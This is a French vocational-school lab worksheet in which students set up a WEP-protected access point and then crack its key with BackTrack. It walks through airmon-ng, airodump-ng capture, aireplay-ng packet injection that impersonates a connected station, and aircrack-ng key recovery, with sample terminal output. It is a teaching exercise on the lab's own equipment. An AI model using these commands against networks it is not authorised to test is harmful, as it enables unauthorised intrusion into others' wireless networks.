LP CHATEAU BLANC

Transcription

LP CHATEAU BLANC
CI-11
installation et configuration de systèmes TR
NOM :
LP CHATEAU BLANC
45 – CHALETTE/LOING
BAC PRO SEN TR
THÈME :
___________________
CI 11 :
ACADÉMIE D’ORLÉANS-TOURS
INSTALLATION ET
CONFIGURATION DE
SYSTEMES TR
LE WIFI
OBJECTIFS :
 EXPLOITER LES FAILLES DE SECURITE D’UN RESEAU WIFI POUR S’Y CONNECTER
Compétences :
Savoirs :
C3 ; C4
S0-5.2 ; S3; S4-2 ; S5-1; S5-2
Ressources :
 UN DVD DE BACK TRACK 5
 2 CLES WIFI USB HERCULES HWGUSB2-54 ET SON CD D’INSTALLATION
 2 ORDINATEURS (UN FUJITSU ET VOTRE PC D044-XX)
 UN ROUTEUR WIFI 7LINK
 INTERNET
 LE SUJET DU TP
TP N° 2
EXPLOITER LES FAILLES D’UN RESEAU WIFI
1. Présentation du TP
7link
réseau
LAN et WLAN
Fujitsu
cartes réseau
Hercules
USB2 sans fil
D044-XX
(pirate)
carte réseau
RJ45
2. Configuration du WLAN du 7link
2.1.
Branchement et RAZ du 7link
1) Le 7link étant branché au secteur, effectuer sa
remise à zéro, en appuyant 20s sur le bouton
prévu à cet effet :
1SEN-TR
 1 
CI-11
installation et configuration de systèmes TR
2) configurer le 7link en mode point d’accès et connecter le port RJ45 du PC
Fujitsu au 7link.
3) Sur le schéma suivant, indiquer les actions à effectuer pour cela :
4) sur la documentation du 7link, retrouver l’@IP par défaut du point d’accès :
192.168.1.254
2.2.
Configuration du WLAN
5) A l’aide d’un explorateur internet, se connecter à l’interface de gestion du
7link :
254
6) Aller dans IP config  Wireless.
Configurer le WLAN tel que :
1SEN-TR
 2 
CI-11
installation et configuration de systèmes TR
-
2.3.
Le SSID soit : testXX (XX votre numéro de poste)
L’authentification soit en mode ouvert
Le type de sécurité/chiffrement soit : WEP 64 bits
La clé soit : 12345ABCDE
Connexion au WLAN
7) A l’aide du CD d’installation de la carte réseau Wifi USB2, installer ses drivers.
8) Puis, à l’aide de l’utilitaire Wifi Station, retrouver le réseau testXX dans la
liste des réseaux découverts. Compléter alors le tableau suivant :
@MAC du point
d’accès
Niveau du signal
Canal RF
type
sécurisé
00:d0:41:b4:4e:c5
100%
6
infrastructure
Oui (WEP)
9) !!! Connecter l’ordinateur Fujitsu au réseau Wifi testXX. !!!
APPELER LE PROFESSEUR
!!
3. Procédure de déchiffrage de la clé WEP du réseau Wifi
10) Consulter les pages web :
http://www.crack-wifi.com/tutoriel-crack-wepaircrack-ng-backtrack.php
et
http://blog.alexandredubois.com/2010/09/02/
tuto-cracker-une-cle-wep-backtrack-4r1/
11) A la lecture de ces pages web, compléter l’algorigramme de la page suivante
par :
Lancer un scan des réseaux wifi environnants et choisir un point d’accès cible.
Laisser la fenêtre du terminal ouverte
Dans le 1er terminal, nombre de « data » capturées  50000 ?
Lister les interfaces wifi disponibles sur votre ordinateur
Se faire passer pour un ordinateur (station) déjà connecté au point d’accès et stimuler
le point d’accès
Arrêter la capture des paquets émis.
Passer l’interface désirée en mode monitor.
Capturer les paquets émis par le point d’accès cible.
cracker la clé à partir des données collectées
1SEN-TR
 3 
CI-11
installation et configuration de systèmes TR
début
Lister les interfaces wifi disponibles sur
votre ordinateur
Passer l’interface désirée en mode monitor
Lancer un scan des réseaux wifi environnants et choisir un point d’accès cible.
Capturer les paquets émis par le point d’accès cible.
Laisser la fenêtre du terminal ouverte
Se faire passer pour un ordinateur (station) déjà connecté au point d’accès et stimuler le
point d’accès
Dans le 1er terminal,
nombre de « data » capturées
>=
50000?
Arrêter la capture des paquets émis
cracker la clé à partir des données collectées
fin
APPELER LE PROFESSEUR
1SEN-TR
!!
 4 
CI-11
installation et configuration de systèmes TR
4. Déchiffrage de la clé WEP étapes par étapes
12) Connecter la 2de clé Wifi USB au PC D044-XX et démarrer l’ordinateur en
bootant sur le DVD Back Track. Lancer l’environnement graphique de Back
Track, sans installer le système d’exploitation.
4.1.
Passage de l’interface wifi en mode moniteur
Attention : le clavier est en querty !!
13) Configurer le clavier en mode Azerty (system  préférences  keyboard…)
14) dans un terminal, exécuter la commande iwconfig :
root@root:~# iwconfig
lo
no wireless extensions.
eth0
no wireless extensions.
wlan0
IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated
Tx-Power=20 dBm
Retry long limit:7
RTS thr:off
Fragment thr:off
Encryption key:off
Power Management:on
15) Quel est le nom de l’interface réseau sans-fil?
Wlan0
16) A l’aide de la commande : airmon-ng start wlan0, passer cette interface en
mode moniteur.
17) Puis, à l’aide d’un iwconfig, vérifier que l’opération s’est bien déroulée :
root@root:/pentest/wireless/aircrack-ng# iwconfig
lo
no wireless extensions.
eth0
no wireless extensions.
wlan0
IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated
Tx-Power=20 dBm
Retry long limit:7
RTS thr:off
Fragment thr:off
Encryption key:off
Power Management:on
mon0
IEEE 802.11bg Mode:Monitor Tx-Power=20 dBm
Retry long limit:7
RTS thr:off
Fragment thr:off
Power Management:off
4.2.
Analyse de l’environnement wifi
Cette étape permet d’analyser les réseaux à portée et les machines connectées. C’est dans
cette étape que l’on va déterminer le réseau dont on veut découvrir la clé WEP.
1SEN-TR
 5 
CI-11
installation et configuration de systèmes TR
18) A l’aide de la commande : airodump-ng --encrypt wep mon0, lancer la
surveillance des réseaux encryptés en wep. compléter ci-dessous le résultat
affiché :
BSSID
PWR
Beacons
#Data, #/s
58
2
CH
0
MB
00:D0:41:AF:D1:8A
-36
6
BSSID
STATION
PWR
Rate
(not associated)
00:D0:41:AF:D1:8A
4C:0F:6E:E7:28:DD
00:08:D3:08:17:89
-81
-49
0 - 1
54 -54
ENC
CIPHER AUTH ESSID
54 . WEP
Lost
WEP
testXX
Packets
0
0
Probes
1
2
19) Sur le résultat précédent, entourer :
– en vert : le SSID de votre réseau wifi testXX
– en rouge : l’@MAC de votre point d’accès
– en bleu : le canal RF utilisé
- en noir : l’@MAC de la station (ordinateur Fujitsu) connectée point d’accès
20) A l’aide de la commande : airodump-ng -w crackXX --channel 6 --bssid
@MAC_point_d'accès mon0 , lancer la capture des paquets émis par le point
d’accès 7link dont le SSID est testXX.
 Le fichier de capture se nommera crackXX (XX étant votre numéro de groupe).
21)
!!! Laisser travailler !!! et dans un autre terminal, vérifier que ce fichier est
bien créé : ls .Noter ci-dessous les fichiers contenus dans le répertoire de
root :
crackXX-01.cap
crackXX-01.csv
4.3.
crackXX-01.kismet.csv
crackXX-01.kismet.netxml
Desktop
Stimulation du réseau cible
En se faisant passer pour un équipement autorisé, on va forcer le point d’accès cible à
« bavarder » avec notre machine. On récupèrera ainsi un maximum de données émises par
le point d’accès wifi.
22) Lancer un terminal et à l’aide de la commande : aireplay-ng -2 -p 0841 -c
ff:ff:ff:ff:ff:ff -b @MAC_point_d'accès mon0, stimuler le point d’accès
en se faisant passer pour la station connectée.
1SEN-TR
 6 
CI-11
installation et configuration de systèmes TR
23) Attendre et vérifier les propositions affichées. Noter ces propositions cidessous :
BSSID = 00:D0:41:AF:D1:8A
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:08:D3:08:17:89
0x0000:
0841 3a01 00d0 41af d18a 0008 d308 1789
.A:...A.........
24) Sur le résultat reporté ci-dessus, entourer l’@MAC correspondant à votre
sation fujitsu.
25) Accepter la proposition en tapant Y (yes)
26) Pour augmenter le nombre de données capturées (Data) dans le premier terminal
laissé ouvert (question 20), il faut simuler un trafic réseau entre Fujitsu et le
point d’accès. Pour cela, depuis Fujitsu, se connecter puis se déconnecter
régulièrement à l’interface Web du point d’accès et observer l’augmentation des
trames capturées dans airodump –ng.
27) Surveiller l’augmentation des données capturées par airodump-ng. Dès qu’elles
atteignent un nombre  50000, stopper l’injection de paquets et la capture en
appuyant sur CTRL + C dans les 2 terminaux.
4.4.
Déchiffrage de la clé
Grâce aux données collectées à l’étape précédente, notre programme sera capable
d’analyser la manière dont le point d’accès wifi « discute » avec nous pour en déduire la clé
wep utilisée.
28) Lancer aircrack-ng dans un terminal et procéder au déchiffrage de la clé WEP
du réseau testXX. Noter la commande (voir sites Web) et son résultat cidessous :
root@root~# aircrack-ng crackXX-01.cap
Opening crackXX-01.cap
Read 870621 packets.
#
BSSID
ESSID
Encryption
1
00:D0:41:AF:D1:8A
testXX
WEP (50267 IVs)
Choosing first network as target.
Opening crackXX-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50267 ivs.
KEY FOUND! [ 12:34:5A:BC:DE ]
Decrypted correctly: 100%
1SEN-TR
 7 
CI-11
installation et configuration de systèmes TR
5. Pour le plus rapides
29) Configurer le WLAN tel que :
- Le SSID soit caché
- L’authentification soit en mode partagé
- Le type de sécurité/chiffrement soit : WPA-PSK (TKIP)
- La clé soit : wpa1senXX ((XX votre numéro de poste)
Sur la copie d’écran ci-dessous, indiquer vos paramètres :
TESTXX
30) Appliquer les modifications et redémarrer le point d’accès :
31) Pour pouvoir connecter le PC Fujitsu, en wifi, au WLAN, il faut ajouter
manuellement le réseau 1SENXX dans la liste de ses réseaux favoris. En effet
le SSID étant caché, ce réseau ne peut pas être découvert automatiquement.
Pour cela :
1SEN-TR
 8 
CI-11
installation et configuration de systèmes TR
Compléter l’ensemble
des informations cidessous
1) A l’aide du PC D044-XX et Back Track, procéder au « crackage » de la clé
WPA. Que peut-on constater ?
Le nombre de données (data) capturées par airodump –n g est quasi nul
 on ne peut pas cracker la clé.
1SEN-TR
 9 